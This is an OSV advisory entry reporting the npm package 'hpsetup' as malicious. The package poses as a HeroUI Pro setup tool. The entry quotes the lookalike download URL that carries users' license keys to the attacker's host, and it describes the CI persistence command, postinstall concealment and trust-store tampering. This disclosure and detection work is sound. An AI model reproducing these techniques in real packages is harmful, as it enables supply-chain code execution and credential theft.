MAL-2026-4579
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hpsetup/MAL-2026-4579.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-4579
- Published
- 2026-05-20T00:54:17Z
- Modified
- 2026-06-12T20:01:52.719785021Z
- Summary
- Malicious code in hpsetup (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (16ed0c34d69e1ea3c5052e3eed20b87fc47e8d4bf1393f7117d34b847347e12c)
When
npx hpsetup <key>runs, the tool fetches a tarball fromhttps://hpsetup-cdn.932324.xyz/api/tarball/<slug>/<version>?key=<userKey>and extracts it directly intonode_modules/@heroui-pro/react(orheroui-native-pro) with no hash check, no signature verification, and no version pin to a publisher origin (src/constants.js:16, src/download.js:24). The destination is a numeric.xyzsubdomain unrelated to HeroUI's real publisher infrastructure, and the package itself ships nohomepage,repository, orauthorfields linking it to heroui.com — yet it brands itself as the HeroUI Pro setup tool and writes into the@heroui-proscope on the consumer's disk. Whatever bytes the CDN returns become the React component library required at runtime, giving the operator of932324.xyzarbitrary code execution in every consuming application. The user's license key (HEROUIKEY / hpxxx) is appended as?key=<userKey>to every CDN fetch, silently relaying paying-customer credentials to the lookalike host (src/download.js:24). After download, the tool patchesvercel.jsonto setinstallCommand: npx -y hpsetup@latest <userKey>(src/vercel.js:18-29), pinning every future Vercel deployment to re-fetch code from the same.xyzCDN and re-send the key — non-interactive runs skip the prompt and apply this automatically. The downloaded tarball'sdist/postinstall/directory andscripts.postinstallentry are silently scrubbed from thepackage.jsonbefore the package manager sees it (src/download.js:11-19), concealing whatever lifecycle script the CDN delivered from npm/pnpm/bun audit and trust prompts. Before any user prompt, the flow also patchespnpm-workspace.yamlallowBuilds /pnpm.onlyBuiltDependencies/trustedDependenciesto auto-trust@heroui-pro/reactandheroui-native-pro(src/install.js:80-92, src/trust.js:1), elevating the privilege of CDN-delivered code without consent. The combination — non-publisher mutable code drop, license-key exfiltration to that same host, CI persistence, postinstall concealment, and silent trust-store mutation — is unambiguous attacker infrastructure impersonating HeroUI Pro. - Database specific
{ "malicious-packages-origins": [ { "import_time": "2026-05-26T05:50:26.574004449Z", "source": "amazon-inspector", "modified_time": "2026-05-20T01:01:56Z", "id": "IN-MAL-2026-003333", "versions": [ "4.5.3-beta.15" ], "sha256": "16ed0c34d69e1ea3c5052e3eed20b87fc47e8d4bf1393f7117d34b847347e12c" }, { "import_time": "2026-05-26T05:50:26.36110872Z", "source": "amazon-inspector", "sha256": "c6d41c41818cea16846d0c53de7213a5ae75b338b9be0a31d3b8f8cf9b732fb0", "id": "IN-MAL-2026-003331", "versions": [ "4.5.5-beta.0" ], "modified_time": "2026-05-20T00:58:45Z" }, { "sha256": "cfedaf7d6d7d2e5179dc4e4de9d285ad23d5fe0301c092b645d7b2366008f3e0", "source": "amazon-inspector", "modified_time": "2026-05-20T00:54:17Z", "id": "IN-MAL-2026-003330", "versions": [ "4.5.3-beta.21" ], "import_time": "2026-05-26T05:50:26.240706569Z" }, { "sha256": "f4117e096edeba8ed55669dfbd80e9bde0f1275b01f2aaa5a34f3d7ce593e43f", "source": "amazon-inspector", "import_time": "2026-05-26T05:51:18.433345634Z", "id": "IN-MAL-2026-003784", "versions": [ "4.5.5-beta.2" ], "modified_time": "2026-05-21T08:35:37Z" }, { "import_time": "2026-05-26T05:51:23.195873973Z", "source": "amazon-inspector", "sha256": "feb7be854981e59ab670c35dad6da08ab5d7e5113ec30f15ad24fc87547f65d2", "id": "IN-MAL-2026-003821", "versions": [ "4.5.5-beta.8" ], "modified_time": "2026-05-21T13:30:35Z" }, { "modified_time": "2026-05-21T14:26:40Z", "source": "amazon-inspector", "sha256": "4b9473fd8455718f8a877a38eeb82104b692f00e13b0421f6a03ef285969541e", "id": "IN-MAL-2026-003868", "versions": [ "4.5.5-beta.9" ], "import_time": "2026-05-26T05:51:28.934999568Z" }, { "import_time": "2026-05-26T05:51:19.85393634Z", "source": "amazon-inspector", "sha256": "56ddba5d5d70ba490441bdcbd64b502d09700e975a15830b45b87bb9fd8d4d8f", "id": "IN-MAL-2026-003796", "versions": [ "4.5.5-beta.7" ], "modified_time": "2026-05-21T09:38:14Z" }, { "import_time": "2026-05-26T05:51:18.873444465Z", "source": "amazon-inspector", "sha256": "8f7e44a55b38e79df2319abde3ebf72194f1f709f0e7fa66fd0621cd734cab31", "id": "IN-MAL-2026-003787", "versions": [ "4.5.5-beta.3" ], "modified_time": "2026-05-21T09:05:08Z" }, { "import_time": "2026-05-26T05:50:29.57401688Z", "source": "amazon-inspector", "modified_time": "2026-05-20T01:29:44Z", "id": "IN-MAL-2026-003360", "versions": [ "4.5.3-beta.7" ], "sha256": "914e178d38b1132f080800e583e4a0e9bd51e0baaa48b8192bbb55057134bf93" }, { "import_time": "2026-06-12T19:43:36.177888914Z", "source": "amazon-inspector", "modified_time": "2026-06-12T19:02:31Z", "id": "IN-MAL-2026-005814", "versions": [ "4.5.7-beta.1" ], "sha256": "a1d2bb391167b94145f855e66553133a2afa977778eda22ef893950f649c11ed" }, { "import_time": "2026-06-12T19:43:36.263550606Z", "source": "amazon-inspector", "sha256": "b2d9e7ba2793b481e2eebe1ae9e7393c389d9d525af665ab567d6609f8d2c8b4", "id": "IN-MAL-2026-005815", "versions": [ "4.6.0" ], "modified_time": "2026-06-12T19:02:33Z" } ] }- References
-
- https://www.npmjs.com/package/hpsetup/v/4.5.3-beta.15
- https://www.npmjs.com/package/hpsetup/v/4.5.5-beta.0
- https://www.npmjs.com/package/hpsetup/v/4.5.3-beta.21
- https://www.npmjs.com/package/hpsetup/v/4.5.5-beta.2
- https://www.npmjs.com/package/hpsetup/v/4.5.5-beta.8
- https://www.npmjs.com/package/hpsetup/v/4.5.5-beta.9
- https://www.npmjs.com/package/hpsetup/v/4.5.5-beta.7
- https://www.npmjs.com/package/hpsetup/v/4.5.5-beta.3
- https://www.npmjs.com/package/hpsetup/v/4.5.3-beta.7
- https://www.npmjs.com/package/hpsetup/v/4.5.7-beta.1
- https://www.npmjs.com/package/hpsetup/v/4.6.0
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / hpsetup
Package
- Name
- hpsetup
- View open source insights on deps.dev
- Purl
- pkg:npm/hpsetup
Affected versions
4.*
Database specific
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hpsetup/MAL-2026-4579.json"
cwes
[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
indicators
{
"package_integrity": [
{
"filename": "hpsetup-4.5.3-beta.15.tgz",
"hashes": {
"sha1": "1e00fcfb99eb66b9291c0a487324851cc9ca6be9",
"sha512_sri": "sha512-iHhLQX/BZa1Bt/m6lOfg3WcXl7sw0riWMfrAy5uQRI7MT1LZ+msvk5AWktN4NBm2cDw3lzqGFlr4J7UHAI4clA=="
}
}
],
"evidence_files": [
{
"tlsh": "854185a70af18b720cb542901a0f60692f348002b64af7e0d2dc0fd47fc1158dd93abd",
"path": "src/download.js",
"sha256": "41265c74bb56042ba4ca5efbfca0c2642ba254dab806f731bf91f4b7255103ba"
},
{
"tlsh": "8b414017dbfe2e322ca16515448b001173a04ba33108daa971ff269d1fc78b8c5a36ee",
"path": "src/vercel.js",
"sha256": "d7945792ea6519e24c59e6c78cc57db29404a8b37c1d149fb2abbdaa495be9f4"
},
{
"tlsh": "8ba2a72982f31576243327a58a1b2042f738e2533508da84be9f67541f47d38d7abbed",
"path": "src/install.js",
"sha256": "b281381c20c90a5b07a33e36f514ae9cd829705c1f3b8ebcdafbf8cf8bc4380a"
},
{
"tlsh": "c5e0d854c9265d7321c825b2182e14677530c98b46587c2c73d7607caf6c29f35fa96d",
"path": "package.json",
"sha256": "fb806314215089f7283a02f94dd7e6418191fd4e5996820454ade67aa85a6fc8"
}
]
}